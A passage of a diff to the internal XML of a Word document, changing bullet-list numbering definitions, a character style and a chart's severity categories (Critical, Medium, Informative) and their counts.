+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="623D0BD9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8C2AA22A"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63B72491"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FB20A044"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="825" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1545" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2265" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2985" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3705" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4425" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5145" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5865" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6585" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6A923094"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="F7400A22"/>
+    <w:tmpl w:val="65B2C36C"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -5184,7 +11437,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6F433661"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0498B1CE"/>
@@ -5297,7 +11550,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6FAB3BC5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0F069DB8"/>
@@ -5413,7 +11666,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76DB0F92"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FF18DD52"/>
@@ -5526,7 +11779,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76EA312A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B03C852A"/>
@@ -5640,13 +11893,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1105462857">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1844978469">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1009603069">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="24"/>
     <w:lvlOverride w:ilvl="0">
       <w:lvl w:ilvl="0">
         <w:start w:val="1"/>
@@ -5778,7 +12031,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1205405582">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="24"/>
     <w:lvlOverride w:ilvl="0">
       <w:lvl w:ilvl="0">
         <w:start w:val="1"/>
@@ -5910,82 +12163,103 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1827014290">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1376924903">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1066956664">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1659066759">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="2052462166">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="1994942108">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="286858210">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1081947982">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1248612588">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="528296576">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="1780293043">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="554901653">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="883635498">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="759763131">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="686911279">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="20" w16cid:durableId="1459644423">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="21" w16cid:durableId="2017877920">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="18241043">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="2017026763">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="65996966">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="25" w16cid:durableId="1435781024">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="26" w16cid:durableId="1644264767">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="27" w16cid:durableId="1570922357">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="28" w16cid:durableId="252127890">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="29" w16cid:durableId="841041874">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="30" w16cid:durableId="1615331854">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="31" w16cid:durableId="1137449353">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="32" w16cid:durableId="772945494">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="33" w16cid:durableId="1437629560">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="34" w16cid:durableId="90244221">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="35" w16cid:durableId="35543775">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="1376924903">
-    <w:abstractNumId w:val="4"/>
+  <w:num w:numId="36" w16cid:durableId="1522207356">
+    <w:abstractNumId w:val="20"/>
   </w:num>
-  <w:num w:numId="7" w16cid:durableId="1066956664">
-    <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="1659066759">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="2052462166">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="1994942108">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="286858210">
-    <w:abstractNumId w:val="16"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="1081947982">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="1248612588">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="528296576">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
-  <w:num w:numId="15" w16cid:durableId="1780293043">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="16" w16cid:durableId="554901653">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="17" w16cid:durableId="883635498">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="759763131">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="19" w16cid:durableId="686911279">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="20" w16cid:durableId="1459644423">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="21" w16cid:durableId="2017877920">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="22" w16cid:durableId="18241043">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="23" w16cid:durableId="2017026763">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="24" w16cid:durableId="65996966">
-    <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="25" w16cid:durableId="1435781024">
+  <w:num w:numId="37" w16cid:durableId="1944798614">
     <w:abstractNumId w:val="19"/>
-  </w:num>
-  <w:num w:numId="26" w16cid:durableId="1644264767">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="27" w16cid:durableId="1570922357">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="28" w16cid:durableId="252127890">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="29" w16cid:durableId="793905951">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="30" w16cid:durableId="54931733">
-    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>
@@ -6617,6 +12891,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -7282,23 +13557,10 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="22"/>
     <w:qFormat/>
-    <w:rsid w:val="001F093C"/>
+    <w:rsid w:val="00465DF6"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:styleId="HTMLCode">
-    <w:name w:val="HTML Code"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="001F093C"/>
-    <w:rPr>
-      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-      <w:sz w:val="20"/>
-      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -7405,7 +13667,7 @@
             <c:bubble3D val="0"/>
             <c:spPr>
               <a:solidFill>
-                <a:srgbClr val="FF0000"/>
+                <a:srgbClr val="C00000"/>
               </a:solidFill>
               <a:ln>
                 <a:noFill/>
@@ -7414,7 +13676,45 @@
             </c:spPr>
             <c:extLst>
               <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
-                <c16:uniqueId val="{00000005-68B0-4384-A586-A7CE183B22EC}"/>
+                <c16:uniqueId val="{00000004-68B0-4384-A586-A7CE183B22EC}"/>
+              </c:ext>
+            </c:extLst>
+          </c:dPt>
+          <c:dPt>
+            <c:idx val="1"/>
+            <c:invertIfNegative val="0"/>
+            <c:bubble3D val="0"/>
+            <c:spPr>
+              <a:solidFill>
+                <a:schemeClr val="accent2"/>
+              </a:solidFill>
+              <a:ln>
+                <a:noFill/>
+              </a:ln>
+              <a:effectLst/>
+            </c:spPr>
+            <c:extLst>
+              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+                <c16:uniqueId val="{00000004-2111-407F-9408-578BD6255D48}"/>
+              </c:ext>
+            </c:extLst>
+          </c:dPt>
+          <c:dPt>
+            <c:idx val="2"/>
+            <c:invertIfNegative val="0"/>
+            <c:bubble3D val="0"/>
+            <c:spPr>
+              <a:solidFill>
+                <a:srgbClr val="00B0F0"/>
+              </a:solidFill>
+              <a:ln>
+                <a:noFill/>
+              </a:ln>
+              <a:effectLst/>
+            </c:spPr>
+            <c:extLst>
+              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+                <c16:uniqueId val="{00000004-E213-4E1B-82EE-F6E8D2F5F8DB}"/>
               </c:ext>
             </c:extLst>
           </c:dPt>
@@ -7475,11 +13775,18 @@
             <c:strRef>
               <c:f>Sheet1!$A$2:$A$6</c:f>
               <c:strCache>
-                <c:ptCount val="1"/>
+                <c:ptCount val="3"/>
                 <c:pt idx="0">
-                  <c:v>High</c:v>
+                  <c:v>Critical</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>Medium</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>Informative</c:v>
                 </c:pt>
               </c:strCache>
+              <c:extLst/>
             </c:strRef>
           </c:cat>
           <c:val>
@@ -7487,11 +13794,18 @@
               <c:f>Sheet1!$B$2:$B$6</c:f>
               <c:numCache>
                 <c:formatCode>General</c:formatCode>
-                <c:ptCount val="1"/>
+                <c:ptCount val="3"/>
                 <c:pt idx="0">
+                  <c:v>2</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>1</c:v>
+                </c:pt>
+                <c:pt idx="2">
                   <c:v>1</c:v>
                 </c:pt>
               </c:numCache>
+              <c:extLst/>
             </c:numRef>
           </c:val>
           <c:extLst>
